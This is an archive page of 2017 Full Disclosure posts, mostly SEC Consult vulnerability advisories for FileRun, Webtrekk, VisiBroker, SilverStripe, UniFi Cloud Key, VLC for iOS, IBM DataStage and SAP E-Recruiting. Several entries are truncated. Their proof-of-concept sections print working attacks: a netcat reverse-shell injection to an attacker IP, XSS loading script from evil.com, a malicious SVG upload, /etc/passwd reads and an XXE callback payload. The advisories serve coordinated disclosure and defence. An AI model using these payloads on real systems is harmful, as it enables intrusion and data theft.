 - Change permissions rights of users
 - Change user passwords

If the victim has no administrative privileges, for example the following
actions can be performed:
 - Upload files
 - Change the email address (for password recovery)


4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.


Proof of concept:
-
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.

URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php


This post request is used to upload a PHP shell in the writable folder
avatars:

POST /?module=fileman_myfiles§ion=ajax&page=up HTTP/1.1
Host: $DOMAIN
[...]
Content-Type: multipart/form-data; 
boundary=---293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close

-293712729522107
Content-Disposition: form-data; name="flowTotalSize"

150
-293712729522107
Content-Disposition: form-data; name="fl

[FD] SEC Consult SA-20171017-0 :: Cross site scripting in Webtrekk Pixel tracking component

2017-10-17 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
===
  title: Cross site scripting
product: Webtrekk Pixel tracking
 vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
  fixed version: v3.41, v4.41, v5.05
 impact: Medium
   homepage: https://www.webtrekk.com/
  found: 2017-08-29
 by: Malte Batram for
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns."

Source: https://www.webtrekk.com/en/solutions/analytics/

"At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system."

Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, has the
capability to load arbitrary external JavaScript via multiple parameter
combinations. The parameters are parsed from the search-part of the URL.

?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript

The URL specified in the parameter wt_reporter is checked by a Regex that can
be bypassed in different ways.


Proof of concept:
-
1) Cross site scripting vulnerability
Example URL:

http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/

The example URL leads to the inclusion of the following HTML in the page:
https://report1.webtrekk.com.evil.com/overlay.pl</a>?
wt_contentId=...">

Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/

The .* at the end of the expression allows multiple bypasses:
 Subdomain:  report1.webtrekk.com.evil.com/
 Auth:   report1.webtrekk@evil.com/
 NoSlash:report1.webtrekk.com

The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl, which at the time of testing was open to be registered, but has been
registered by Webtrekk for security reasons now.

The vulnerability can also be triggered via cookies. This enables an attacker
to execute JavaScript in the session of the victim anytime the website with
the vulnerable script is visited, after only using the parameters from the
search once to set the cookie values.

Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;


Vulnerable / tested versions:
-
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip

Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5

The setup for version 5 is different and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However code similiar to
the overlay functions from version 3 and 4 seems to be loaded dynamically (which
also includes the same Regex check).

According to the vendor, v5 is affected as well.


Vendor contact timeline:

2017-08-30: Contacting vendor through a...@webtrekk.com & email under "Contact",
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory


Solution:
-
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:

v3.41, v4.41, v5.05

According to the vendor, the updated versions are available within the
support center on the vendor's website for all customers and a

[FD] SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++

2017-10-15 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
===
  title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
 vulnerable version: 8.5 SP2
  fixed version: 8.5 SP4 HF3
 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
 impact: High
   homepage: https://www.microfocus.com/products/corba/visibroker/
  found: 2017-04
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying,
and managing distributed applications. Built on open industry standards and a
high-performance architecture, VisiBroker is especially suited to low-latency,
complex, data-oriented, transaction-intensive, mission-critical environments.
Using VisiBroker(R), organizations can develop, connect, and deploy complex
distributed applications that have to meet very high performance and reliability
standards. With more than 30 million licenses in use, VisiBroker is the world’s
most widely deployed CORBA Object Request Broker (ORB) infrastructure."

URL: https://www.microfocus.com/products/corba/visibroker/


Business recommendation:

During a superficial fuzzing test, SEC Consult found several memory corruption
vulnerabilities that allow denial of service attacks or potentially arbitrary
code execution. Although the fuzzing test only had a very limited coverage,
several vulnerabilities have been identified. Assuming the code quality is
homogenous, it is possible that other parts of the application exhibit similar
issues.

SEC Consult did not attempt to fully evaluate the potential impact of the
identified vulnerabilities.

SEC Consult recommends to decommission any VisiBroker C++ component that
communicates with untrusted entities until a full security audit has been
performed. Moreover, SEC Consult recommends to restrict network access to all
CORBA services that utilize the VisiBroker C++ environment.


Vulnerability overview/description:
---
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs.
As a result, the application reads memory until a non-mapped memory region
is reached. This causes the application to encounter a segmentation fault.


2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an
integer overflow. This causes the application to allocate too little memory.
When the application attempts to write to this memory buffer, heap memory is
overwritten leading to denial of service or potentially arbitrary code
execution.


3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause
the application to read past an allocated memory region.


4) Use after Free
SEC Consult found that the application under certain circumstances tries to
access a memory region that has been deallocated before.

It is unclear whether Micro Focus fixed the root cause of this behaviour. As
the vendor was unable to reproduce the vulnerability in the current version,
Micro Focus believes that the vulnerability was fixed with a previous update.

Since SEC Consult is unsure whether Micro Focus found the root cause of the
vulnerability, we refrain from releasing proof of concept code.


Proof of concept:
-
A service implementing the following IDL was used to identify the
vulnerabilities listed here:

module Bank {
  interface Account {
float balance(in string test);
  };
  interface AccountManager {
Account open(in string name);
  };
};

The implemented service was based on the Visibroker example project
"bank_agent".


1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method

CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
  CORBA_MarshalOutBuffer *this,
  const char *src,
  unsigned int size)

is used to copy/append a char[] into a buffer. If the size of the data that is
stored in the buffer plus the size of the char[] to be appended exceeds the
allocated size, the method reallocates the buffer. By choosing the
size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow
can be caused. The method then continues without allocating additional memory.

However, the application then expects that the source buffer contains 0x
bytes o

[FD] Internet Security Conference 2017 in China by 360 Qihoo

2017-09-17 Thread Vulnerability Lab 
Internet Security Conference China (Asia) - 360 Qihoo

Event Url: http://isc.360.cn/2017/en/index.html

---

Speaker: Benjamin Kunz Mejri

Keynote:  People is the key factor of online security

Possibilities of Individuals & IT-Security - Security Researcher &
Bounty Hunter “No System is Safe!”

---

Speaker: Patrick Paumen

Keynote: Bio Hackers

---

References:

http://www.cctvplus.com/news/20170913/8060916.shtml#!language=1

http://science.china.com.cn/2017-09/14/content_40013916.htm

http://www.cfbond.com/zt/2017hlwdh/

https://news.cgtn.com/news/344e34557a6333566d54/share_p.html

http://www.chinanews.com/business/2017/09-12/8329096.shtml

http://www.yicai.com/image/5344069.html

http://www.csdn.net/article/a/2017-09-14/15932211

https://mp.weixin.qq.com/s/KVHGaQ54v6YkppN10l32sg



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20170914-1 :: Persistent Cross-Site Scripting in SilverStripe CMS

2017-09-14 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20170914-1 >
===
  title: Persistent Cross-Site Scripting
product: SilverStripe CMS
 vulnerable version: <=3.5.3
  fixed version: 3.6.1
 impact: Medium
   homepage: https://www.silverstripe.org/
  found: 2017-03-15
 by: S. Tripathy (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"SilverStripe is the intuitive content management system and flexible
framework loved by editors and developers alike. Equip your web teams
to achieve outstanding results."

Source: https://www.silverstripe.org/


Business recommendation:

SEC Consult recommends to do a proper output sanitization on uploaded
SVG files. Users should upgrade to version 3.6.1 or higher. A thorough
source code analysis is recommended.


Vulnerability overview/description:
---
1) Persistant Cross Site Scripting
Due to the lack of input validation and output sanitization,
an attacker can upload SVG files containing malicious JavaScript
code to be executed under a victim's browser context.


Proof of concept:
-
1) Persistant Cross Site Scripting
Example: XSS using SVG File Upload

The file upload function in the CMS allows to upload SVG files.
But it doesn't sanitize output of the file which leads to XSS.

There are 2 vulnerable instances of the same vulnerability.
 1: The "Insert Media" option in the content editor.
 2: The path "/admin/assets/add/"

During editing contents or creating a new page an attacker can upload
an SVG image using the "Insert Image" button.

The request below shows that an attacker can upload an SVG file with
malicious payloads.
==
POST /admin/pages/edit/EditorToolbar/MediaForm/field/AssetUploadField/upload 
HTTP/1.1
Host: $host
   ---snip---
Cookie: PHPSESSID=esqs7da6338k0sgj7itn3tcil7; bypassStaticCache=1
Connection: close

-969190451574
Content-Disposition: form-data; name="SecurityID"

undefined
-969190451574
Content-Disposition: form-data; name="AssetUploadField"; 
filename="evilsvgfile.svg"
Content-Type: image/svg+xml


http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>


http://www.w3.org/2000/svg";>
   
   
  alert('XSS!');
   

-969190451574--
==


Using the same process an attacker can also upload a malicious SVG file in the 
path
"/admin/assets/add/".


A low privilege editor user such as a "Content Editor" can also exploit this
vulnerability.


Vulnerable / tested versions:
-
The following version is affected by the identified vulnerabilities which
was the most recent version at the time of discovery:

Silverstripe CMS version <=3.5.3


Vendor contact timeline:

2017-03-22: Contacting vendor through secur...@silverstripe.org
2017-03-23: Vendor provided public key certificates
2017-03-23: Sent the advisory to vendor
2017-04-17: Follow-up with vendor on the status
2017-04-17: Vendor responded work in progress
2017-05-09: Follow-up with vendor on the status, no response from the vendor
2017-05-24: Informed the vendor on releasing the advisory
2017-05-31: Vendor: vulnerability has been fixed, verified that it is not
2017-06-07: Vendor confirmed that the issue is not fixed and it will be fixed in
the next release.
2017-06-27: Silverstripe Version 3.6.1 released
2017-09-14: Public release of advisory


Solution:
-
Upgrade to SilverStripe v3.6.1
https://www.silverstripe.org/download/

Changelog: https://docs.silverstripe.org/en/3/changelogs/3.6.1


Workaround:
---
Do not allow uploading an SVG file.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the fi

[FD] SEC Consult SA-20170914-0 :: Authenticated Command Injection in Ubiquiti Networks UniFi Cloud Key

2017-09-14 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20170914-0 >
===
  title: Authenticated Command Injection
product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware version <=0.6.4
  fixed version: Firmware version >=0.6.9
 CVE number: -
 impact: High
   homepage: https://www.ubnt.com
  found: 2017-03-26
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

The patch supplied by the vendor should be installed immediately.

There are indications for further security issues within this device, hence
SEC Consult recommends performing a detailed review by security professionals.


Vulnerability overview/description:
---
1) Authenticated Command Injection in Administrative Interface
A change of the username with a hand crafted request leads to command injection
in the administrative interface. This vulnerability can be exploited when the
cloud key web interface is exposed to the internet.

An attacker which can access the administrative web interface of the cloud
key after cracking a cloud account password is able to execute arbitrary
commands without access to the local network. Since the Ubiquiti switches also
use the same credentials, the whole network can be compromised over this attack
vector.


Proof of concept:
-
1) Authenticated Command Injection in Administrative Interface
The following PHP code excerpt is responsible for the username command 
execution:

(api.inc, line 455)
---
[...]
function chusername($username) {
exec(CMD_CHUSERNAME . ' ' . $username, $out, $rc);
return $rc;
}
[...]
---

Since '$username' is not filtered, a command injection is possible.

The following POST request opens a reverse-shell to the attacker:
---
POST /api/account HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
X-Access-Token: 
Referer: https://$host/manage/maintenance
Content-Length: 57
Cookie: CKSESSIONID=
Connection: close

{"username":";busybox nc $attackerIP 8999 -e /bin/bash;"}
---

As listener, netcat was used:
$ nc -lvp 


Vulnerable / tested versions:
-
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested.
This version was the latest at the time the security vulnerabilities
were discovered. Version 0.6.4 has been checked and found to be
vulnerable as well.


Vendor contact timeline:

2017-03-29: Contacting vendor via HackerOne. Vendor sets status to
"Triaged".
2017-04-24: Asking for a status update; No answer.
2017-05-06: Found update 0.6.4 on the website of the vendor, firmware
is still vulnerable.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-06-01: Vendor sent a link to the fixed version 0.6.9.
2017-06-07: Verified the fix in this version. Vendor marked the issue
as resolved.
2017-09-13: Public release of security advisory


Solution:
-
Upgrade to v0.6.9 or above.
https://community.ubnt.com/t5/UniFi-Updates-Blog/UniFi-Cloud-Key-firmware-0-6-9-has-been-released/ba-p/1974091


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowle

[FD] SEC Consult SA-20170913-1 :: Local File Disclosure in VLC media player iOS app

2017-09-13 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20170913-1 >
===
  title: Local File Disclosure
product: VLC media player iOS app
 vulnerable version: 2.7.8
  fixed version: 2.8.1
 CVE number: -
 impact: Medium
   homepage: 
https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8
  found: 2017-08-22
 by: Ahmad Ramadhan Amizudin (Office Malaysia)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"VLC is a free and open source cross-platform multimedia player and framework
that plays most multimedia files as well as DVDs, Audio CDs, VCDs, and various
streaming protocols."

Source: https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8


Business recommendation:

The identified vulnerability allows attackers to steal arbitrary files
(accessible by the app) from the mobile device.

SEC Consult recommends not to enable "Sharing over WiFi" feature in VLC
for iOS which allows wireless file transfer to/from PC until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Local file disclosure
The 'Sharing over WiFi' feature in VLC for iOS is vulnerable to a local file
disclosure vulnerability. An attacker can read any files which can be accessed
with current application privileges. This issue can lead to data theft.


Proof of concept:
-
1) Local file disclosure
The example below shows how the LFD vulnerability can be exploited.

URL : http://$IP:$PORT/download/
METHOD  : GET
EXAMPLE : http://$IP:$PORT/download//etc/passwd


The source code excerpt below shows the vulnerable code of the mobile app:

VULN. FILE : Sources/VLCHTTPConnection.m
VULN. CODE :
[...]
- (NSObject *)_httpGETDownloadForPath:(NSString *)path
{
NSString *filePath = [[path 
stringByReplacingOccurrencesOfString:@"/download/"
withString:@""]stringByReplacingPercentEscapesUsingEncoding:NSUTF8StringEncoding];
HTTPFileResponse *fileResponse = [[HTTPFileResponse alloc]
initWithFilePath:filePath forConnection:self];
fileResponse.contentType = @"application/octet-stream";
return fileResponse;
}
[...]


Vulnerable / tested versions:
-
VLC version 2.7.8 has been tested on iOS 10.3.3 and found to be vulnerable.


Vendor contact timeline:

2017-08-23: Contacting vendor through email
2017-08-23: Vendor replied, they are looking at it
2017-09-05: Asked for a status update from the vendor
2017-09-09: Vendor released patch in version 2.8.1
2017-09-13: Public release of advisory


Solution:
-
Upgrade to the latest version available:
https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8


Workaround:
---
Disable the 'Sharing over WiFi' feature.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Ahmad Ramadhan / @2017



smime.p7s
Description: S/MIME Cryptographic Signature

__

[FD] SEC Consult SA-20170913-0 :: Multiple Vulnerabilities in IBM Infosphere Information Server / Datastage

2017-09-13 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20170913-0 >
===
  title: Multiple Vulnerabilities
product: IBM Infosphere Information Server / Datastage
 vulnerable version: 9.1, 11.3, and 11.5 (including Cloud version 11.5)
  fixed version: -
 CVE number: CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467
 impact: Critical
   homepage: http://www-03.ibm.com/software/products/en/ibminfodata
  found: 2017-03-16
 by: Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep 
Singh
 (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"IBM® InfoSphere® DataStage® integrates data across multiple systems
using a high performance parallel framework, and it supports extended
metadata management and enterprise connectivity. The scalable platform
provides more flexible integration of all types of data, including big
data at rest (Hadoop-based) or in motion (stream-based), on distributed
and mainframe platforms."

Source: http://www-03.ibm.com/software/products/en/ibminfodata


Business recommendation:

Attackers are able to bypass authorization controls to execute system commands.
The vendor did not provide a patch but mitigation steps which have to be
implemented.

SEC Consult recommends the vendor to conduct a comprehensive security analysis,
based on security source code reviews, in order to identify all vulnerabilities
in the Remote Management platform and increase the security for its customers.


Vulnerability overview/description:
---
1) Weak Authorization (CVE-2017-1467)
The Administrator Client allows users with high priviledges to execute commands.
A low privileged application user can replay the same request and execute 
arbitrary
commands on the server.

This happens because the application links to a single linux user in the backend
server. The application privileges are based on this system user irrespective of
the user role of the application user.

Hence, any command can be executed by a low privileged application user in the
backend OS, depending on the privileges of the linux user the application is 
using.


2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
The Designer client allows users to import files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the 
application.


3) DLL Preloading
Dynamic Link Library (DLL) files are loaded from the application's home 
directory
without being verified. This may lead to execution of arbitrary files on the 
system as
any users can replace the DLLs.


4) Loading Arbitrary Executables (CVE-2017-1468)
The Director and Designer Client do not check for any file signatures before 
loading
and executing other executable files. Existing files can be replaced by any 
user with
executable files, which will be executed from the toolbar.


5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
User credentials are stored in clear text within the memory which can be
dumped to retrieve these credentials.


Proof of concept:
-
1) Weak Authorization (CVE-2017-1467)
Any command can be injected back to the Administrator Client to execute system
commands.
Example:
==
SH -c "cat /etc/passwd"
==

2) XML External Entity Injection (XXE) (CVE-2017-1383)
For example by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to attacker system.

===

 
   http://[IP:port]/"; >]>&xxe;
===

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

3) DLL Preloading
Removed proof of concept.

4) Loading Arbitrary Executables (CVE-2017-1468)
The following executables can be re

[FD] SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting

2017-09-12 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 >
===
  title: Email verification bypass
product: SAP E-Recruiting
 vulnerable version: 605, 606, 616, 617
  fixed version: see SAP security note number 2507798
 impact: medium
   homepage: https://www.sap.com
  found: 2017-07-12
 by: Marc Nimmerrichter (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"SAP E-Recruiting" has recruitment and succession planning instruments that
will help your company find new employees, employ them in positions that suit
their capabilities, promote their professional development, and retain them in
the long term.
As well as enabling you to handle your company’s applicant tracking activities,
"SAP E-Recruiting" ensures that you drive up-to-date human resources management,
by proactively maintaining contact with applicants, potential candidates, and
consequently, with your employees.

Source:
https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm


Business recommendation:

Email address verification during the applicant registration can be bypassed.
Businesses using the vulnerable component are advised to estimate the impact of
insufficient email address verification on their business processes and react
accordingly. It is recommended to install a patched version as soon as possible.


Vulnerability overview/description:
---
When an external applicant registers to the E-Recruiting application, he/she
receives a link by email to confirm access to the provided email address.
However, this measure can be bypassed and attackers can register and confirm
email addresses that they do not have access to.

An attacker could register email addresses not belonging to him/her. This could
have a business impact, because business processes might rely on a verified
email address. Furthermore, since an email address can be registered only once,
an attacker could prevent other legitimate users from registering to the
E-Recruiting application.


Proof of concept:
-
The email verification link contains the "param" HTTP GET parameter with base64
encoded data. When decoded, this data contains the parameters
"candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental
user ID. corr_act_guid is a random value that needs to be provided during the
email verification. However, this value is not bound to the current
registration, which means that the value of a previous registration can be
reused. Since candidate_hrobject is incremental, it can be guessed by an
attacker. An attacker who wants to register with an email address not belonging
to him/her, could simply do the following:

  1. Register with his own email address
  2. Directly afterwards register with someone else's email address
  3. Read the current value of candidate_hrobject in the confirmation
 link from the first registration
  4. Increment this value by 1
  5. Send the new value in the HTTP GET request, use the corr_act_guidparameter
 from the first registration
  6. If this did not work: go back to step 4 to try the next ID
 (maybe other people registered in between the two registrations)

This attack works because there is no per-registration nonce in the
confirmation link.


Vulnerable / tested versions:
-
The vulnerability was found in the following release of E-Recruiting (ERECRUIT):
Release: 617

According to the vendor, the following versions are affected:
Release: 605, 606, 616, 617


Vendor contact timeline:

2017-07-12: Contacted vendor via encrypted email with vulnerability description
and Responsible Disclosure Policy attached at sec...@sap.com
2017-07-13: Vendor confirmed the receipt of the email
2017-07-25: Vendor confirmed the vulnerability
2017-07-31: Contacted vendor to ask for patch release date and versions affected
2017-08-01: Vendor stated they are working on the fix and requested "adequate
time". Link to SAP Responsible Disclosure Policy was provided.
2017-08-01: Discussing release date, requested planned patch release date and
versions affected.
2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31
and requested more time before advisory publication.
2017-08-23: Contacted vendor to request current patch status, p

<    1   2   3   4   5   6   7   8   9   >